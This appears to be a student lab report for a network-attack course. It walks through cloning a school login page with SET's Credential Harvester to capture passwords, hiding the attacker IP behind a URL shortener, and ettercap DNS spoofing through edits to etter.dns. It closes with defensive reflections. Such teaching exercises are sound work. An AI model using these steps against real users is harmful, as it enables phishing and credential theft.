setoolkit
ettercap -v
查看版本信息ettercap -G
选择模式:下拉sniff选项。
菜单处view中可查看嗅探到的通信信息
使用sudo vi /etc/apache2/ports.conf
命令修改Apache的端口文件,将端口改为http对应的80号端口
netstat -tupln |grep 80
查看80端口是否被占用。
kill+进程号
杀死该进程,或使用kill -s 9 进程号
强制杀死进程systemctl start apache2
setoolkit
1:Social-Engineering Attacks
(社会工程学攻击)选择2:Website Attack Vectors
(钓鱼网站攻击向量)
3::Credential Harvester Attack Method
(即登录密码截取攻击)2:Site Cloner
克隆网站192.168.132.141
http://www.besti.edu.cn/
(咱们学校官网)这里会有一个提示,不用管他,按一下回车即可
提示“Do you want to attempt to disable Apache?”,选择y
192.168.132.141
,按下回车后跳转到被克隆的网页:不知道为啥!!只有网页代码,,我佛了,试了一下其他网站页面是ok的,应该是学校网页的问题?
我们可以在攻击机上看到如下提示:
http://192.168.200.83/cas/login
(咱们学校教务网登录界面)在kali上我们可以清楚的看到对面的连接和登录信息了
为了进一步伪装攻击机IP,我们可以利用网址缩短网站,将攻击机IP输入,然后生成一个网址。这样靶机访问该网址时和直接输入IP的效果是一样的。
ifconfig eth0 promisc
将kali网卡改为混杂模式vi /etc/ettercap/etter.dns
对DNS缓存表进行修改在61行添加两行代码
www.mosoteach.cn A 192.168.132.141(kali IP)
www.cnblogs.com A 192.168.132.141
ettercap -G
开启ettercap图形化界面Sniff
——>unified sniffing
在弹出的界面中选择eth0
——>ok
,即监听eth0网卡
点击工具栏中的Hosts
——>Scan for hosts
扫描子网
点击工具栏中的Hosts
——>Hosts list
查看存活主机
将网关IP添加到target1,靶机IP添加到target2
Plugins
——>Manage the plugins
dns_spoof
即DNS欺骗的插件start
——>Start sniffing
选项开始嗅探靶机上输入ping www.mosoteach.cn
或ping www.cnblogs.com
,可以在Kali端看到反馈信息。这里有点奇怪,正常来说捕捉到的应该是kali的IP才是正确的,,我也不知道为什么显示成这样了,可能是抽了?或者这个攻击手段并不是100%的成功率吧
相应的,靶机下显示的ping回应都是kali主机的IP,这里倒是正确了
打开靶机浏览器,输入www.mosoteach.cn,应该能够跳转到教务网的网页上,效果如下:
在这个网址上输入登录信息
-可以看到kali实验一的界面成功显示了靶机输入的用户信息。
Do you want to attempt to disable Apache?
的情况,此后靶机登录信息无法监测到。我检查了端口已关闭,Apache之前也已经开启。问题出在哪里我也没找出来。解决办法就是重启电脑,找个网快的地方,操作慢一点,然后看脸(猜测是因为网速问题)通常在什么场景下容易受到DNS spoof攻击
在日常生活工作中如何防范以上两攻击方法
这次的实验原理和操作都挺简单的。主要就是利用SET工具建立冒名网站(使得冒名网站和攻击者在同一个网关下)以后,再利用DNS 欺骗,修改了DNS缓存表,使得与攻击者在同一网关下的靶机在搜索真正的网站域名时,首先寻找到了攻击者的冒名网站,从而进入了攻击者的陷阱。我们在外面连接免费wifi的时候很容易就和坏人处在同一网关下,这样被欺骗获取登录信息的可能性就很大了。因此不管从防范的意识还是电脑的防护措施方面来说,我们都要加强对自己个人信息的保护。
2018-2019-2 网络对抗技术 20165322 Exp7 网络欺诈防范
原文:https://www.cnblogs.com/wangyaojia/p/10803912.html